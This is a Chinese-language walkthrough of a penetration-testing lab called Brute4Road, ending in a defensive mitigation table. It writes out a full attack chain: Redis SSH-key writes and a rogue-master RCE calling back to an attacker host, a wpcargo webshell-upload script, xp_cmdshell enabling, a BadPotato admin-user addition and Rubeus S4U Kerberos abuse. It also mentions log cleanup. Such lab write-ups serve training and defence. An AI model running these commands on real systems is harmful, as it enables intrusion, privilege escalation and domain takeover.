从Redis未授权到域控提权实战复盘春秋云镜Brute4Road靶场通关全过程在渗透测试的实战演练中如何将看似孤立的漏洞串联成完整的攻击链是衡量一个安全研究员技术水平的重要标准。春秋云镜Brute4Road靶场正是这样一个模拟真实企业内网环境的绝佳训练场它要求攻击者从外网突破开始逐步深入内网最终获取域控权限。本文将详细拆解这一过程中的关键决策点、技术选型与思维转换帮助读者掌握渗透测试中的战术思维。1. 外网突破Redis未授权访问的利用艺术Redis作为高性能的内存数据库常因配置不当导致未授权访问漏洞。在Brute4Road靶场中Fscan扫描发现目标存在Redis未授权访问这成为整个攻击链的起点。1.1 从SSH密钥写入到主从RCE的思维转换传统Redis利用方式通常尝试写入SSH公钥config set dir /root/.ssh config set dbfilename authorized_keys set x \n\nssh-rsa AAAAB3N...\n\n save但当遇到权限限制时需要立即转换思路。主从复制模式RCE成为更优选择工具选择使用redis-rogue-server工具搭建恶意主节点命令执行git clone https://github.com/n0b0dyCN/redis-rogue-server.git python3 redis-rogue-server.py --rhost 靶机IP --lhost 攻击机IP交互式Shell获取python -c import pty; pty.spawn(/bin/bash)关键提示现代Redis部署往往限制高危目录写入主从RCE成功率更高且不受目录权限影响1.2 初始立足点的加固与信息收集获取初始Shell后应立即检查SUID权限文件find / -user root -perm -4000 2/dev/null挖掘配置文件中的数据库凭证查找网络拓扑信息如/etc/hosts、ifconfig2. 内网横向移动从Web应用到数据库的穿透通过FRP等工具建立隧道后内网扫描发现WordPress和MSSQL服务成为新的攻击面。2.1 WordPress插件漏洞的武器化利用WPScan识别出wpcargo插件存在漏洞CVE-2022-24663可通过精心构造的请求上传Webshellimport requests payload 2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50 destination_url http://内网IP/ requests.get( f{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text{payload}sizefactor.09size1filepath/var/www/html/shell.php )利用获取的Webshell提取wp-config.php中的数据库凭证进而获取内网敏感数据。2.2 MSSQL服务的提权之路从WordPress数据库中发现的密码字典可用于爆破MSSQL服务启用xp_cmdshellEXEC sp_configure show advanced options,1;RECONFIGURE; EXEC sp_configure xp_cmdshell,1;RECONFIGURE;使用BadPotato提权Ladon48.exe BadPotato net localgroup administrators hacker /add建立持久化通道添加用户并开启远程桌面服务3. 域环境渗透从普通域用户到域控管理员内网信息收集发现域环境后攻击进入最后阶段。3.1 票据传递攻击的实战应用使用Mimikatz提取服务账号哈希后Rubeus工具链成为突破域控的关键获取可转发TGT.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:服务账号哈希 /domain:xiaorang.lab /nowrapS4U2Self协议滥用.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /ptt /ticket:base64票据访问域控资源type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt3.2 攻击链中的关键决策点工具选择逻辑何时使用现成工具vs手动利用权限维持技巧除常规用户添加外可考虑Golden Ticket制作日志清理要点Redis、MSSQL、域控各节点的痕迹处理4. 防御视角的思考与改进建议从蓝队角度复盘整个攻击路径可得出以下加固建议攻击阶段防御措施检测方法Redis暴露启用认证、限制绑定IP监控config set等敏感命令WordPress及时更新插件、文件完整性监控检测异常的barcode.php请求MSSQL服务禁用xp_cmdshell、强密码策略审计sp_configure调用域环境限制服务账号权限、启用PAC验证监控异常的Kerberos票据请求在实际渗透测试项目中这种从外到内、层层递进的攻击路径非常典型。掌握每个环节的备选方案如Redis主从RCE替代SSH写入和快速切换能力才是区分普通脚本小子和专业渗透测试师的关键。